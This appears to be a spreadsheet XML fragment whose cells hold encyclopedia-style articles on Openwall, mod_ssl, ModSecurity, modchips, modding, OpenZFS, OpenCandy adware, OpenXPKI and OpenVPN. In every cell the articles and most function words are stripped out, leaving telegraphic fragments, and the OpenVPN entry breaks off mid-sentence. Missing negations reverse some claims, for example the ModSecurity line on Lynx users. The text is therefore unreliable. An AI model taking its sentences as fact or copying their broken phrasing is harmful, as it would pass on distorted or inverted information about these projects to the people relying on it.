    <t>openwall project source various software, including openwall gnu/*/linux (owl), security-enhanced linux distribution designed servers. openwall patches security extensions included many major linux distributions. name implies, openwall gnu/*/linux draws source code design concepts numerous sources, importantly project usage linux kernel parts userland, others include bsds, openbsd openssh suite inspiration behind blowfish-based crypt password hashing, compatible openbsd implementation. public domain software openwall project maintains also list algorithms source code public domain software. openwall gnu/*/linux releases lwn.net reviewed openwall linux 3.0. they wrote: first question people "security-enhanced" owl? aren't major linux distributions enterprise linux, ubuntu, opensuse, secure? course, continuously patch known security vulnerabilities (red particular) implement security features decrease impact vulnerabilities, none really focused preventing vulnerable software getting distribution first place. poc||gtfo issues international journal proof-of-concept fuck (poc||gtfo) mirrored openwall project samizdat licence. first issue published 2013, issue featured chaos computer club. issue 2015 homage dobb's journal, could rendered .pdf, .zip, .bpg, .html. also references external links official website openwall distrowatch</t>
  </si>
  <si>
    <t>Openssh</t>
  </si>
  <si>
    <t>Mod ssl</t>
  </si>
  <si>
    <t>mod_ssl optional module apache http server. provides strong cryptography apache v1.3 webserver secure sockets layer (ssl v2/v3) transport layer security (tls cryptographic protocols help open source ssl/tls toolkit openssl. original version created apache v1.3 initially created april 1998 ralf engelschall porting laurie's apache-ssl 1.17 source patches apache 1.2.6 apache 1.3b6. this version bsd-style license. version v2.0 later, contrast, maintained apache software foundation licensed apache license 2.0. possible provide http https single server machine, http https different server ports, direct conflict them. either maintainer would separate apache server instances (one binds port port 443) apache's virtual hosting facility maintainer create virtual servers apache dispatches: responding port speaking http responding port speaking https. differences original mod_ssl apache available www.modssl.org third-party add-on package requiring additional steps compilation configuration process. also, maintainer server needs resolve additional system apache dependencies. apache contrast, built-in module maintained apache software foundation, mod_ssl easily activated compilation configuration options. history mod_ssl package initially created april 1998 ralf engelschall porting laurie's apache-ssl 1.17 source patches apache 1.2.6 apache 1.3b6. because conflicts laurie's development cycle re-assembled scratch apache 1.3.0 merging mod_ssl newer apache-ssl 1.18. from point mod_ssl lived life mod_ssl first publicly released version mod_ssl 2.0.0 august 1998. after export restrictions cryptographic software loosened, mod_ssl became part apache http server release apache httpd october 2009, latest version released mod_ssl apache mod_ssl v2.8.31-1.3.41 february 2008. also list apache modules modules apache http server. references external links current mod_ssl documentation business logic security testing (blst) official mod_ssl website module apache 1.x.</t>
  </si>
  <si>
    <t>ModSecurity</t>
  </si>
  <si>
    <t>modsecurity, sometimes called modsec, open-source application firewall (waf). originally designed module apache http server, evolved provide array hypertext transfer protocol request response filtering capabilities along security features across number different platforms including apache http server, microsoft nginx. free software released apache license 2.0. platform provides rule configuration language known 'secrules' real-time monitoring, logging, filtering hypertext transfer protocol communications based user-defined rules. although configuration, modsecurity commonly deployed provide protections generic classes vulnerabilities using owasp modsecurity core rule (crs). this open-source rules written modsecurity's secrules language. project part owasp, open application security project. several rule sets also available. detect threats, modsecurity engine deployed embedded within webserver proxy server front application. this allows engine scan incoming outgoing http communications endpoint. dependent rule configuration engine decide communications handled includes capability pass, drop, redirect, return given status code, execute user script, more. history modsecurity first developed ivan ristić, wrote module goal monitoring application traffic apache http server. first version released november 2002 supported apache http server 1.3.x. starting 2004 ivan created thinking stone continue work project full-time. while working version rewrite thinking stone bought breach security, american-israeli security company, september 2006. ivan stayed continuing development version subsequently released summer 2006. ristić breach security released another major rewrite, version 2.5, major syntactic changes february 2008. 2009 ivan left breach found labs. shortly ivan's departure breach security, trustwave holdings acquired breach june 2010 relicensed modsecurity apache license. development continued license allowed easier integration modsecurity products. result steady adoption modsecurity various commercial products. license change also precipitated easier porting software. hence, microsoft contributed port august 2012 port nginx released black briefings 2012. 2017 second edition handbook released, written christian folini ivan ristić. covers modsecurity version 2.9.2. being originally apache module, porting modsecurity platforms time-consuming high maintenance costs. result this, complete rewrite started december 2015. this iteration, libmodsecurity, changes underlying architecture, separating modsecurity standalone engine communicates server api. this modular architecture-based waf, announced public january 2018, became libmodsecurity (modsecurity version 3.0) supported connectors nginx apache. 2021, trustwave holdings, announce end-of-sale (eos) trustwave support modsecurity effective august 2021 end-of-life (eol) support effective july 2024. maintenance modsecurity code given open-source community. former lynx browser blocking default rules shipped modsecurity distributions owasp modsecurity core rule (crs). these rules used block lynx browser "automated tool", returning "406 acceptable" unless user-agent string changed. this inconvenienced users blindness work lynx. however, release core rule (crs3), lynx user agent trigger rules anymore. references external links official website official modsecurity documentation mod_security apache debian/ubuntu linux modsecurity introduction install guide searchsecurity.techtarget.com</t>
  </si>
  <si>
    <t>Modchip</t>
  </si>
  <si>
    <t>modchip (short modification chip) small electronic device used alter disable artificial restrictions computers entertainment devices. modchips mainly used video game consoles, also blu-ray players. they introduce various modifications host system's function, including circumvention region coding, digital rights management, copy protection checks purpose using media intended markets, copied media, unlicensed third-party (homebrew) software. function construction modchips operate replacing overriding system's protection hardware software. they achieve either exploiting existing interfaces unintended undocumented manner, actively manipulating system's internal communication, sometimes point re-routing substitute parts provided modchip. most modchips consist integrated circuits (microcontrollers, fpgas, cplds), often complemented discrete parts, usually packaged small within console system designed for. although modchips reprogrammed different purposes, modchips designed work within console system even specific hardware version. modchips typically require degree technical skill install since must connected console's circuitry, commonly soldering wires select traces chip legs system's circuit board. some modchips allow installation directly soldering modchip's contacts console's circuit ("quicksolder"), precise positioning electrical contacts ("solderless"), rare cases, plugging system's internal external connector. memory cards cartridges offer functions similar modchips work completely different concept, namely exploiting flaws system's handling media. such devices referred modchips, even frequently traded umbrella term. diversity hardware modchips operate varying methods mean modchips often used goal, work vastly different ways, even intended console. some first modchips nintendo wii, known drive chips, modify behaviour communication optical drive bypass security. xbox 360, common modchip took advantage fact short periods instability could used fairly reliably lead incorrectly compare security signatures. precision required attack meant modchip make cpld. other modchips, xenogc clones nintendo gamecube, invoke debug mode security measures reduced absent case stock atmel microcontroller used). recent innovation optical disk drive emulators odde, replace optical disk drive allow data come another source bypassing need circumvent security. these often make fpgas enable accurately emulate timing performance characteristics optical drives. history most cartridge-based console systems modchips produced them. they usually implemented copy protection regional lockout game cartridges, hardware software level. converters passthrough devices used circumvent restrictions, flash memory devices (game backup devices) widely adopted later years copy game media. early transition solid-state optical media, cd-based console systems regional market segmentation copy protection measures rarity high cost user-writable media time. modchips started surface playstation system, increasing availability affordability writers increasing sophistication protocols. time, modchip's sole purpose allow imported copied game media. today, modchips available practically every current console system, often great number variations. addition circumventing regional lockout copy protection mechanisms, modern modchips introduce sophisticated modifications system, allowing user-created software (homebrew), expanding hardware capabilities host system, even installing alternative operating system completely re-purpose host system (e.g. home theater pc). anti-modchip measures most modchips open system copied media, therefore availability modchip console system undesirable console manufacturers. they react removing intrusion points exploited modchip subsequent hardware software versions, changing layout modchips customized for, firmware software detect installed modchip refuse operation consequence. since modchips often hook fundamental functions host system cannot removed adjusted, measures completely prevent modchip functioning prompt adjustment installation process programming, e.g. include measures make undetectable ("stealth") host system. with advent online services used video game consoles, manufacturers executed possibilities within service's license agreement consoles equipped modchips using services.in effort dissuade modchip creation, console manufacturers included option homebrew software even alternative operating system consoles. however, features withdrawn later date. argument made console system remains largely untouched modchips long manufacturers provide official running unlicensed third-party software. legality prominent functions many modchips—the circumvention copy protection mechanisms—is outlawed many countries' copyright laws digital millennium copyright united states, european copyright directive various implementations member countries, australian copyright act. other laws apply many diversified functions modchip, e.g. australian specifically allowing circumvention region coding. ambiguity applicable law, nonuniform interpretation courts, constant profound changes amendments copyright allow definitive statement legality modchips. modchip's legality country's legislature individually asserted court. most cases brought court ended conviction modchip merchant manufacturer respective country's anti-circumvention laws. small number cases united kingdom australia dismissed argument system's copy protection mechanism would able prevent actual infringement copyright—the actual process copying game media—and therefore cannot considered effective technical protection measure protected anti-circumvention laws. 2006, australian copyright amended effectively close legal loophole.in 2017 lawsuit retailer, canadian court ruled favor nintendo anti-circumvention provisions canadian copyright law, prohibit breaching technical protection measures. court ruled even though retailer claimed products could used homebrew, thus asserting exemptions maintaining interoperability, court ruled nintendo offers development kits platforms, interoperability could achieved without breaching tpms, thus defence invalid. alternatives alternative installing modchip process softmodding device. softmodded device need permanently additional hardware pieces inside. instead, software device internal part modified order change device's behaviour. also game backup device operation tangled references</t>
  </si>
  <si>
    <t>Modding</t>
  </si>
  <si>
    <t>modding slang expression derived english verb modify". term refers modification hardware, software, anything else, perform function originally intended designer, achieve bespoke specification appearance. term often used relation video games, particularly regard creating altered content sharing web. applied overclocking computers order increase frequency operates. case modding popular activity amongst many computer enthusiasts involves customization computer case installation water cooling technology. connection automobiles, modding connote engine tuning, remapping vehicle's engine control unit customization coachwork. computers digital equipment legal issues modding sometimes infringe legal rights copyright owner. some nations laws prohibiting modding accuse modders attempting overcome copy protection schemes. united states, dmca stiff penalties mods violate rights intellectual property owners. european union, member states agreed copyright directive transposing national law. 22-year-old convicted caerphilly magistrates' court united kingdom july 2005 selling modded xbox built software games. however also worthy note european countries interpreted legal issues way. italy judge threw sony case saying owners console similarly spain, chips ruled legal despite copyright legislation. modding unauthorized change made software hardware platform gaming. case mods modifications device altering certain styles. example, people microsoft xbox alter lights controller glow different colors. august 2009 matthew crippen, 27-year-old student california state university, fullerton, arrested modifying game consoles including xbox 360, playstation nintendo profit. crippen testified owners could play backup discs drm-laden gaming software legally own. however, dmca states illegal circumvent copyright protection software, even non-infringing uses backing legally owned games. december 2010 prosecutors dropped charges crippen inadmissible evidence obtained audio-less video recording deemed illegal california law. video game consoles common example kind modding video game console chips, allow users play homemade games, games legitimately purchased regions, legal backup copies, also allow illegal unauthorized copies allowing player play personally recorded copies video games. modchips, current form, first available sony playstation (and later playstation various types copyright circumvention systems also existed nintendo older game consoles (though neither include actual modding, instead backup devices). types modding there different ways running unsigned code game console. soft modding (modifying software, normally using softmod) allow user change data contained hard drive case xbox. another type modding, known hard modding, done modifying hardware, components connected hypervisor order exploits bios console unsigned code games. this form 'modding' (more correctly termed hacking), popular softmodding, mostly done able 'run' many different types software. soft modding popular ease installation relatively price even done free right tools). another type console modding appearances, much like computer case modification. which includes, adding lights (most likely leds, cathodes electro-luminescent lighting). cutting game system case, hardware and/or expose internal systems. cooling large part console hard 'modding', including: heat sink upgrades, powerful quieter fans, even abandon common heat exchange together liquid cooling console (most notably xbox 360, initially heat problems). game software side, companies actively encourage modding products. cases tivo google, informal agreement modders company modders agree anything destroys company's business model company agrees support modding community providing technical specifications information. some commercial video games thrive modding community. case half-life warcraft iii, mods called counter-strike defense ancients (dota) respectively, drove sales original software years. device drivers modded drivers made improved performance official versions drivers offer cases official versions drivers hardware designed older operating systems windows computer hardware case modding range simple case chassis) painting, extensive case modifications custom-fabricated pieces. terms modding modder expanded encompass broad range customization personal-computer enthusiasts, especially gaming pcs, including: custom homemade hard- soft-line liquid cooling loops; installation strips lighting effects; replacement stock cooling fans high-performance ones coolers, power supplies, cases, drive bays, components); "delidding" cpus gpus replace stock thermal paste pads high-thermal-conductivity ones; addition individually sleeved (and often color-coordinated) cabling; replacement various heat sinks custom liquid-cooling water blocks components normally air-cooled (e.g. ram, gpus, ssds); addition components usually found pcs, electronic timers temperature humidity alarms; custom soldering replace change behavior components; expansion motherboard's capabilities pcie add-in cards risers (the latter also used mount graphics cards sideways show better); addition server hardware consumer-grade system; extensive overclocking detailed benchmarking seeks squeeze every last percentage performance improvement without system becoming unstable. cars vehicles orthopedic ortho-modding adaptation (seats, pedals, etc.) help drivers prevent, correct diminish light orthopedic backbone/spine problems. eco-modding eco-modding reduction drag, petroleum adaptation renewable energy (generally, changing adding engine motor), generally hydrogen electricity. hybrid car. occasionally, known diesel engine plant animal oils. biodiesel. performance tuning engine tuning modification enhanced performance, engine power output, handling, aerodynamics, cosmetic purposes. also category:vehicle modification. industrial machines factories rather expensive machines used mass-produce specialized parts. these machines altered make parts manufacturers machines designed intended them. legality depends owns machines, whether agreement, supplied machines factories, said anything this, laws nation done. example, machines might leased manufacturer machines. ever returned, need back kind condition engineering shape first delivered. there annual physical inventory make sure factory everything leasing. this audit might done representatives leasing company, looking recognizable machines, match models safety rules. pens pen-modding combining many parts either help spinning, perfect balance desired create ideal spinning pen, simply decoration. these mods either made combining parts different pens and/or mechanical pencils, buying modded pens online. cases, mods exceed $30–40 pen. also body modification custom house audio audio equipment modifications construction. hackerspace holga inexpensive brand medium-format cameras often modded numerous ways owners. video game modular design references media related modded objects wikimedia commons</t>
  </si>
  <si>
    <t>OpenZFS</t>
  </si>
  <si>
    <t>openzfs cddl licensed open-source storage platform encompasses functionality traditional filesystems volume manager. includes protection data corruption, support high storage capacities, efficient data compression, snapshots copy-on-write clones, continuous integrity checking automatic repair, encryption, remote replication send receive, raid-z. eponymous openzfs project brings together developers illumos, linux, freebsd macos platforms, wide range companies annual openzfs developer summit.founding members openzfs include matt ahrens, main architects zfs. openzfs project open source derivative oracle project. 2019, openzfs platforms freebsd) gradually pivoted based upon linux, developed faster variants openzfs contains features ported versions. merged code-base include number features performance enhancements, proposed known openzfs 2.0. history file system originally developed microsystems solaris operating system. source code released 2005 common development distribution license (cddl) part opensolaris operating system, later ported operating systems environments.the following list events development various implementations, leading creation openzfs umbrella project:: 2001: closed-source development started engineers microsystems. 2005: source code released part opensolaris. 2006: development fuse port linux started. 2007: apple started porting 2008: port freebsd released part freebsd 7.0. 2008: development native linux port started, known linux. 2009: apple's project closed, maczfs project continued develop code. 2010: opensolaris discontinued, resulting development solaris longer open-source. 2010: illumos forked opensolaris open-source successor, continued develop open. ports platforms continued pulling upstream changes illumos. 2012: feature flags introduced replace legacy on-disk version numbers, enabling easier distributed evolution on-disk format support features. 2013: coexisting stable version maczfs, prototype generation (known openzfs o3x) uses linux upstream codebase. 2013: first stable release linux. 2013: official announcement openzfs umbrella project. features fixes regularly pulled openzfs illumos pushed ports platforms, vice versa. 2016: ubuntu 16.04 includes open-source file system variant default ported versions (2005–2010) claimed cddl legal incompatibility 2005, sun's implementation file system used basis development linux kernel module, merged linux kernel mainline, linux distributions include precompiled kernel module. workaround, fuse, framework allows file systems userspace, used linux separation layer licensing issues effect, although issues include performance penalty. however, april 2016 release ubuntu 16.04 includes cddl-licensed linux kernel module maintained separate project, outside linux kernel mainline, claiming license compatibility. apple/macos release version 10.5, available read-only mode command line, lacks possibility create zpools write them. before 10.5 release, apple released "zfs beta seed v1.1", allowed read-write access creation zpools; however, installer "zfs beta seed v1.1" reported work version 10.5.0, updated version 10.5.1 above. august 2007, apple opened project forge site. site, apple provided source code binaries port includes read-write access, installer available third-party developer created one. october 2009, apple announced shutdown project forge. that hosting involvement summarily discontinued. explanation given. apple eventually released legally required, cddl-derived, portion source code final public beta zfs, code named "10a286". complete support advertised feature snow leopard server (mac server 10.6). however, time operating system released, references feature removed features page. apple commented regarding omission. apple's "10a286" source code release, versions previously released source binaries, preserved development adopted maczfs project resume development elsewhere. july 2012, maczfs implements zpool version version october 2008 release solaris. additional historical information commentary found maczfs site faq. implementations opensolaris opensolaris 2008.05, 2008.11 2009.06 default filesystem. there dozen 3rd-party distributions. openindiana openindiana uses openzfs feature flags implemented illumos. version used version 151a3.by upgrading opensolaris snv_134 openindiana solaris express, also ability upgrade separately boot solaris express pool. macos openzfs (abbreviated o3x) implementation macos. active development, close relation linux illumos' implementation, maintaining feature flag compatibility linux. implements zpool version 5000, includes solaris porting layer (spl) originally written maczfs, enhanced include memory management layer based illumos kmem vmem allocators. fully featured, supporting compression, deduplication, arc, l2arc, slog. maczfs free software providing support macos. stable legacy branch provides pool version filesystem version development branch, based linux openzfs, provides updated functionality, zpool version 5000 feature flags. proprietary implementation (zevo) available cost greenbytes, inc., implementing file system version pool version zevo offered limited feature set, pending commercial development; sold oracle 2014, unknown future plans. dragonflybsd edward o'callaghan started initial port dragonflybsd. netbsd netbsd port started part 2007 google summer code august 2009, code merged netbsd's source tree. freebsd paweł jakub dawidek ported freebsd, part freebsd since version 7.0. this includes zfsboot, allows booting freebsd directly dataset. freebsd's implementation fully functional; missing features kernel cifs server iscsi, latter added using externally available packages. samba used provide userspace cifs server. freebsd 7-stable (where updates series versions committed uses zpool version freebsd includes much-updated implementation zfs, zpool version supported. zpool version support added 8-stable branch january 2010, included freebsd release 8.1. zpool version supported release 8.2. 8-stable branch gained support zpool version version early june 2011. these changes released mid-april 2012 freebsd 8.3. freebsd 9.0-release uses pool version freebsd 9.2-release first freebsd version "feature flags" based implementation thus pool version 5000. freebsd 13.0-release switches implementation illumos-based code base unified openzfs code base. this change allows freebsd receive openzfs improvements much quicker. midnightbsd midnightbsd, desktop operating system derived freebsd, supports storage pool version 0.3-release. this derived code included freebsd 7.0-release. update storage pool progress 0.4-current based 9-stable sources around freebsd 9.1-release code. trueos (formerly pc-bsd) trueos (formerly known pc-bsd, defunct) desktop-oriented distribution freebsd, inherited support. truenas core, (formerly freenas) truenas core, embedded open source network-attached storage (nas) distribution based freebsd, support freebsd pc-bsd. pfsense pfsense, open source based router, supports zfs, including installation booting pools, version 2.4. xigmanas xigmanas (formerly nas4free), embedded open source network-attached storage (nas) distribution based freebsd, support freebsd, storage pool version 5000. this project continuation freenas series project. debian gnu/kfreebsd being based freebsd kernel, debian gnu/kfreebsd support kernel. however, additional userland tools required, possible root /boot file system case required grub configuration performed debian installer since wheezy release. january 2013, zpool version available squeeze release, wheezy-9 release. linux although filesystem supports linux-based operating systems, difficulties arise linux distribution maintainers wishing provide native support products potential legal incompatibilities cddl license used code, license used linux kernel. enable support within linux, loadable kernel module containing cddl-licensed code must compiled loaded kernel. according free software foundation, wording license legally prohibits redistribution resulting product derivative work, though viewpoint caused controversy. fuse potential workaround licensing incompatibility trialed 2006, experimental port code linux's fuse system. filesystem entirely userspace instead integrated linux kernel, therefore considered derivative work kernel. this approach functional, suffered significant performance penalties compared integrating filesystem native kernel module running kernel space. 2016, fuse project appears defunct. native linux native port linux produced lawrence livermore national laboratory (llnl) released march 2013, following events: 2008: prototype determine viability 2009: initial zvol lustre support 2010: development moved github 2011: posix layer added 2011: community early adopters 2012: production usage 2013: stable releaseas august 2014, linux uses openzfs pool version number 5000, indicates features supports defined feature flags. this pool version unchanging number expected never conflict version numbers given oracle. infotech another native port linux developed infotech 2010. this port used zvol implementation lawrence livermore national laboratory starting point. release supporting zpool announced january 2011. april 2011, infotech acquired stec, inc., work ceased. source code port found github.the work infotech ultimately integrated llnl's native port linux. source code distribution while license incompatibility arise distribution compiled binaries containing code, generally agreed distribution source code affected this. gentoo, configuring root filesystem well documented required packages installed package repository.slackware also provides documentation supporting zfs, kernel module built kernel. ubuntu integration question cddl license's compatibility license resurfaced 2015, linux distribution ubuntu announced intended make precompiled openzfs binary kernel modules available end-users directly distribution's official package repositories. 2016, ubuntu announced legal review resulted conclusion providing support binary kernel module violation provisions license. others, software freedom center followed ubuntu's conclusion, reiterated opposing view.ubuntu 16.04 ("xenial xerus"), released april 2016, allows user install openzfs binary packages directly ubuntu software repositories. 2019, legal challenge brought canonical regarding distribution packages. 2019, ubuntu supports experimental installation root filesystem, starting 19.10 release ("eoan ermine"), support coexistence nearly pure grub operating systems disk. truenas scale version truenas ixsystems, based debian linux. still uses openzfs main storage. adds container support, kubernetes docker. further more, allow clustered docker gluster. beta june 2021. microsoft windows port open source attempted 2010 hiatus year development ceased 2012. october 2017 port openzfs announced jörgen lundman openzfs developer summit. releases feature histories within illumos (from 2013) openzfs 2010: illumos founded open source successor, continued develop open. ports platforms continued porting upstream changes illumos. 2013: openzfs project founded, aiming coordinated open-source development zfs. openzfs project provides common foundation interested groups organizations contribute collaborate towards common open source core, addition, also maintain specific code validation processes needed core code work individual systems. other ports forks following list open-source ports forks: 2006: development fuse port linux started. 2007: apple started porting 2008: port freebsd released part freebsd 7.0. 2008: development native linux port started. 2009: apple's project closed. maczfs project continued develop code. detailed release histories with oracle solaris: features introduced, version numbers pool file system incremented designate format features available. features available specific file system versions require specific pool version.distributed development openzfs involves feature flags pool version 5000, unchanging number expected never conflict version numbers given oracle. legacy version numbers still exist pool versions 1–28, implied version 5000. illumos uses pool version 5000 purpose. future on-disk format changes enabled disabled independently feature flags. version history pool versions feature flags originally, version numbers pool file system incremented features introduced, order designate on-disk file system format available features. this worked well single entity controlled development zfs, versioning scheme still oracle solaris.in distributed development model, single version number ideal implementations openzfs would need agree changes on-disk file system format. solution selected openzfs introduce feature flags versioning system tags on-disk format changes unique names, supports completely independent format changes format changes depend other. pool moved used openzfs implementations long feature flags pool supported implementations.: 26–27 openzfs, pool version permanently 5000, signifying pool indicates features setting unsetting feature flags rather incrementing pool version. number 5000 chosen expected never conflict version numbers given oracle. legacy version numbers still exist pool versions 1–28. future on-disk format changes enabled disabled independently feature flags. legacy version numbers still exist pool versions 1–28, implied pool version 5000; initial proposal 1000 pool version.: future on-disk format changes enabled disabled independently feature flags. feature flags exposed pool properties, following naming scheme rules:: format property name feature@&lt;org-name&gt;:&lt;feature-name&gt; &lt;org-name&gt; reverse name organization developed feature, ensuring unique property names. property names shortened feature@&lt;feature-name&gt; remain unambiguous.for example, feature@com.foocompany:async_destroy valid property name, could shortened feature@async_destroy.: each pool feature either disabled, enabled, active state. disabled features used, on-disk format changes made; result, features backward-compatible. enabled features used, on-disk format changes made yet, software make changes time; features still backward-compatible. active features made backward-incompatible on-disk format changes pool.: when pool feature enabled, legacy version pool automatically upgraded 5000 prerequisite features also enabled. default, pools created supported features enabled. general, state feature changed active back enabled, undoing performed on-disk format changes making pool compatible older openzfs implementation; however, features might possible.: on-disk format changes associated either features write features read. former features openzfs implementation must support capable writing pool, supporting features mandatory opening pool read-only mode. latter features openzfs implementation must support able read pool open opening pool possible without actually reading it.: example, async_destroy feature adds on-disk data structure keep track freed datasets, openzfs implementation need know data structure access pool read-only mode. additionally, writing pool features active state possible openzfs implementation support features.: list feature flags operating systems support available open-zfs.org site openzfs historically, openzfs implemented core code, operating system's team adapting projects. this cases feature stagnation divergence features command lines, different operating systems developed divergent features fixes, often single platform rather across platforms. over time, feature development shifted illumos linux. these features fixes backported illumos could re-ported freebsd. difficult linux version also included many smaller changes, hard disentangle.in 2018, agreed openzfs development would overhauled remedy issues. rather import linux changes platforms piecemeal, entire linux code would 'pivoted' whole, platforms based actively developed linux version. wide range ported features, including many long-desired enhancements, would also rolled ported across platforms, future changes would discussed across platforms implemented. plans included appropriate porting layers prevent linux, linux-kpi shim code introduced platform kernels.the features progress ported openzfs lengthy, includes: faster rollout enhancements features across platforms. command line standardisation improved pool portability (zfs pools created system equally used another) wider cross-platform feature parity platform independence overlay (union) mounts accepted default fixes enhancements various features working freebsd trim aclmode enhancements holds (from freebsd) enhanced native nfsv4 acls (freebsd) enhanced aes-gcm performance encrypted pools redacted send/receive spacemap metaslab management enhancements project re-implement zfs' management free space "metaslabs" much greater efficiency fast clone deletion zstd data compression option channel program property inheritance altivec raid-z bookmark support copying direct support persistent l2arc (l2arc retained across reboots) sequential (high speed) scrub resilver scrub pause/resume resilver restart device (vdev) removal zpool initialize checkpoint channel programs large dnode allocation classes (allowing specific high speed storage designated metadata deduplication tables) parallel pool mounting per-vdev properties deduplication enhancements dedup-log (high speed deduplication), dedup table size limits, deduplication table preloading (loaded fully time rather piecemeal needed), listed "nice have" 2018, stated april 2020 "coming along nicely" largely complete also comparison file systems btrfs copy-on-write file system linux hammer high-availability file system dragonfly write anywhere file layout (wafl) netapp's proprietary file layout references external links openzfs project: website list openzfs distributions freebsd: webpage github wiki illumos: webpage github linux: webpage github macos: webpage github google windows: webpage github openzfs office hours youtube, october 2013, matt ahrens openzfs device removal, january 2015, alex reece</t>
  </si>
  <si>
    <t>OpenCandy</t>
  </si>
  <si>
    <t>opencandy adware module potentially unwanted program classified malware many anti-virus vendors. they flag opencandy undesirable side-effects. designed installation desired software. produced sweetlabs, consists microsoft windows library incorporated windows installer. when user installs application bundled opencandy library, option appears install software recommends based scan user's system geolocation. both option offers generates selected default installed unless user unchecks continuing installation.opencandy's various undesirable side-effects include changing user's homepage, desktop background search provider, inserting unwanted toolbars, plug-ins extension add-ons browser. also collects transmits various information user usage without notification consent. development software originally developed divx installation, darrius thompson. when installing divx, user prompted optionally install yahoo! toolbar. divx received $15.7 million first nine months 2008 yahoo software developers, million downloads.chester former divx business development director, chief business officer mark chweh, former divx engineering director, chief technology officer. windows components components program differing similar names based version. files dropped occomsdk.dll ocsetuphlp.dll fusion.dll processes spidentifier.exe rundll32.exe http queries tracking.opencandy.com.s3.amazonaws.com media.opencandy.com cdn.opencandy.com cdn.putono5.com tracking.opencandy.com api.opencandy.com www.arcadefrontier.com software known included opencandy workarounds there workaround bypass opencandy running installers /nocandy parameter command line, installer support not. references</t>
  </si>
  <si>
    <t>OpenXPKI</t>
  </si>
  <si>
    <t>openxpki project stewards open-source public infrastructure (pki) software. history openxpki project commenced 2005 began produce usable software 2010 choose take precautionary approach first production level release 2015. approach taken create modular system modules capable re-utilised systems workflow engine centered approach.the software mostly written perl designed unix-like operating systems freebsd linux. database backends created mysql, postgresql, oracle database db2. technical after installation software node configured certificate authority (ca), registration authority (ra) end-entity enrolement (ee) node.one client implementation frontend allows end-users access openxpki system using browser, command line interface also available system administrators. openxkpi also scep interface available. reception openxpki used successfully scenarios performance testing enterprise level environments. shortcomings requires additional components complete certificate based authentication, including software efficient certificate distribution. references footnotes sources bartosch, martin november 2005). "white paper architecture overview" (pdf). openxpki.org. archived original (pdf) april 2021. raphaely, eytan february 2021). "what openxpki?". securew2. retrieved 2021.{{cite web}}: maint: url-status (link) mahnke, wolfgang; leitner, stefan–helmut; damm, matthias (2009). unified architecture. berlin: springer. doi:10.1007/978-3-540-68899-0. isbn 978-3-540-68899-0. oclc 1259125048. müller, klaus-rainer (2011). it-sicherheit system [systematic security] german). springer. isbn 978-3-8348-8178-6. oclc 7326304165. openxpki (2021). "openxpki feature overview". openxpki.org. archived original april 2021. retrieved november 2021. schmeh, klaus (2016). kryptografie: verfahren, protokolle, infrastrukturen [cryptography: procedures, protocols, infrastructures] german). heidelberg dpunkt verlag. isbn 9783864903564. oclc 936174582. external links openxpki project</t>
  </si>
  <si>
    <t>OpenVPN</t>
  </si>
  <si>
    <t>openvpn virtual private network (vpn) system implements techniques create secure point-to-point site-to-site connections routed bridged configurations remote access facilities. implements client server applications. openvpn allows peers authenticate using pre-shared secret keys, certificates username/password. when used multiclient-server configuration, allows server release authentication certificate every client, using signatures certificate authority. uses openssl encryption library extensively, well protocol, contains many security control features. uses custom security protocol utilizes ssl/tls exchange. capable traversing network address translators (nats) firewalls.openvpn ported embedded several systems. example, dd-wrt openvpn server function. softether vpn, multi-protocol server, also implementation openvpn protocol.it written james yonan free software, released terms general public license version (gplv2). additionally, commercial licenses available. architecture encryption openvpn uses openssl library provide encryption data control channels. lets openssl encryption authentication work, allowing openvpn ciphers available openssl package. also hmac packet authentication feature additional layer security connection (referred "hmac firewall" creator). also hardware acceleration better encryption performance. support mbed available starting version 2.3. authentication openvpn several ways authenticate peers other. openvpn offers pre-shared keys, certificate-based, username/password-based authentication. preshared secret easiest, certificate-based robust feature-rich. version username/password authentications enabled, without certificates. however, make username/password authentications, openvpn depends third-party modules. networking openvpn user datagram protocol (udp) transmission control protocol (tcp) transports, multiplexing created tunnels single tcp/udp port (rfc 3948 udp).from 2.3.x series openvpn fully supports ipv6 protocol virtual network inside tunnel openvpn applications also establish connections ipv6. ability work proxy servers (including http) good working network address translation (nat) getting firewalls. server configuration ability "push" certain network configuration options clients. these include addresses, routing commands, connection options. openvpn offers types interfaces networking universal tun/tap driver. create either layer-3 based tunnel (tun), layer-2 based ethernet carry type ethernet traffic. openvpn optionally compression library compress data stream. port 1194 official iana assigned port number openvpn. newer versions program default port. feature version allows process manage several simultaneous tunnels, opposed original "one tunnel process" restriction series. openvpn's common network protocols (tcp udp) makes desirable alternative ipsec situations block specific protocols order force users subscribe higher-priced, "business grade," service tier. example, comcast previously declared @home product was, always been, designated residential service allow commercial applications. their argument conducting remote work adversely affect network performance regular residential subscribers. they offered alternative, @home professional, would cost @home product. anyone wishing would subscribe higher-priced, business-grade service tier.when openvpn uses transmission control protocol (tcp) transports establish tunnel, performance acceptable long sufficient excess bandwidth un-tunneled network link guarantee tunneled timers expire. becomes untrue, performance falls dramatically. this known "tcp meltdown problem". security openvpn offers various internal security features. 256-bit encryption openssl library, although service providers offer lower rates, effectively providing fastest available consumers. runs userspace instead requiring stack (therefore kernel) operation. openvpn ability drop root privileges, mlockall prevent swapping sensitive data disk, enter chroot jail initialization, apply selinux context initialization. openvpn runs custom security protocol based tls, rather supporting ike, ipsec, l2tp pptp. openvpn offers support smart cards pkcs#11-based cryptographic tokens. extensibility openvpn extended third-party plug-ins scripts, called defined entry points. purpose often extend openvpn advanced logging, enhanced authentication username passwords, dynamic firewall updates, radius integration plug-ins dynamically loadable modules, usually written scripts interface execute scripts binaries available openvpn. openvpn source code examples plug-ins, including authentication plug-in. several third-party plug-ins also exist authenticate ldap databases sqlite mysql. platforms available solaris, linux, openbsd, freebsd, netbsd, qnx, macos windows later. openvpn available mobile operating systems including maemo, windows mobile below, 3gs+ devices, jailbroken 3.1.2+ devices, android 4.0+ devices, android devices cyanogenmod aftermarket firmware flashed correct kernel module installed. compatible mobile phone oses, including palm "web-based" shown page citrix terminal services access; program installed independently configured editing text files manually, rather gui-based wizard. openvpn compatible clients ipsec l2tp pptp protocols. entire package consists binary client server connections, optional configuration file, files depending authentication method used. firmware implementations openvpn integrated several router firmware packages allowing users openvpn client server mode network routers. router running openvpn client mode, example, allows device network access without needing capability install openvpn. notable firmware packages openvpn integration include: openvpn also implemented manufacturer router firmware. software implementations openvpn integrated softether vpn, open-source multi-protocol server, allow users connect server existing openvpn clients. openvpn also integrated vyos, open-source routing operating system forked vyatta software router. licensing openvpn available versions: openvpn community edition, free open-source version openvpn access server (openvpn-as) based community edition, provides additional paid proprietary features like ldap integration, server, management provides installation configuration tools reported simplify rapid deployment remote-access 